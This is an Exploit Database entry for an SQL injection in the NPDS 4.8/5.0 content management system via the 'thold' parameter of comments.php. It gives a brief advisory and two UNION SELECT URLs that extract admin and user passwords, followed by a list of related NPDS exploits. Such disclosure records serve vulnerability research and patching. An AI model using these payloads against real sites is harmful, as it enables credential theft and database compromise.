Exploit Database - Logo

NPDS 4.8/5.0 - 'comments.php?thold' SQL Injection

EDB-ID: 25671 Author: NoSP Published: 2005-05-16
CVE: CVE-2005-1637 Type: Webapps Platform: PHP
Aliases: N/A Advisory/Source: Link Tags: N/A
E-DB Verified: Verified Exploit: Download Exploit Code Download / View Raw Vulnerable App: N/A
« Previous Exploit Next Exploit » 
source: http://www.securityfocus.com/bid/13649/info

NPDS is prone to an SQL injection vulnerability.

This issue is due to a failure in the application to properly sanitize user-supplied input to the 'thold' parameter.

Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.

All versions are considered to be vulnerable at the moment.


http://www.example.com/npds/comments.php?thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,aid,pwd,0,0%20FROM%20authors

http://www.example.com/npds/comments.php?thold =0%20UNION%20SELECT%200,0,0,0,0,0,0,0,uname,pass,0,0%20FROM%20users
« Previous Exploit Next Exploit »

Related Exploits

Trying to match CVEs (1): CVE-2005-1637
Trying to match OSVDBs (1): 16648
Other Possible E-DB Search Terms: NPDS 4.8/5.0,  NPDS 4.8,  NPDS
Date D V Title Author
2006-06-12 Verified NPDS 5.10 - Multiple Input Validation VulnerabilitiesDarkFig
2010-05-20 Verified NPDS REvolution 10.02 - 'admin.php' Cross-Site Request ForgeryHigh-Tech B...
2010-05-18 Verified NPDS REvolution 10.02 - 'download.php' Cross-Site ScriptingHigh-Tech B...
2010-05-13 Verified NPDS REvolution 10.02 - 'download.php' SQL InjectionHigh-Tech B...
2010-05-13 Verified NPDS REvolution 10.02 - 'topic' Cross-Site ScriptingHigh-Tech B...
2007-03-18 Verified Net Portal Dynamic System (NPDS) 5.10 - Remote Code Execution (1)DarkFig
2007-05-04 Verified Net Portal Dynamic System (NPDS) 5.10 - Remote Code Execution (2)Gu1ll4um3r0...
2002-09-25 Verified NPDS 4.8 - News Message HTML Injectiondas@hush.com
2005-05-28 Verified NPDS 4.8 < 5.0 - 'admin.php?language' Cross-Site ScriptingNoSP
2005-05-28 Verified NPDS 4.8 < 5.0 - 'faq.php?categories' Cross-Site ScriptingNoSP
2005-05-28 Verified NPDS 4.8 < 5.0 - 'links.php?Query' SQL InjectionNoSP
2005-05-28 Verified NPDS 4.8 < 5.0 - 'powerpack_f.php?language' Cross-Site ScriptingNoSP
2005-05-28 Verified NPDS 4.8 < 5.0 - 'reply.php?image_subject' Cross-Site ScriptingNoSP
2005-05-28 Verified NPDS 4.8 < 5.0 - 'reviews.php?title' Cross-Site ScriptingNoSP
2005-05-28 Verified NPDS 4.8 < 5.0 - 'sdv_infos.php?sitename' Cross-Site ScriptingNoSP
2005-05-28 Verified NPDS 4.8 < 5.0 Glossaire Module - 'terme' SQL InjectionNoSP
2005-05-16 Verified NPDS 4.8/5.0 - 'pollcomments.php?thold' SQL InjectionNoSP
2015-01-24 Waiting verification NPDS CMS REvolution-13 - SQL InjectionNarendra Bhati
2005-05-28 Verified NPDS 4.8 /5.0 - 'modules.php?Lettre' Cross-Site ScriptingNoSP
2008-12-04 Verified NPDS < 08.06 - Multiple Input Validation VulnerabilitiesJean-Franço...
Menu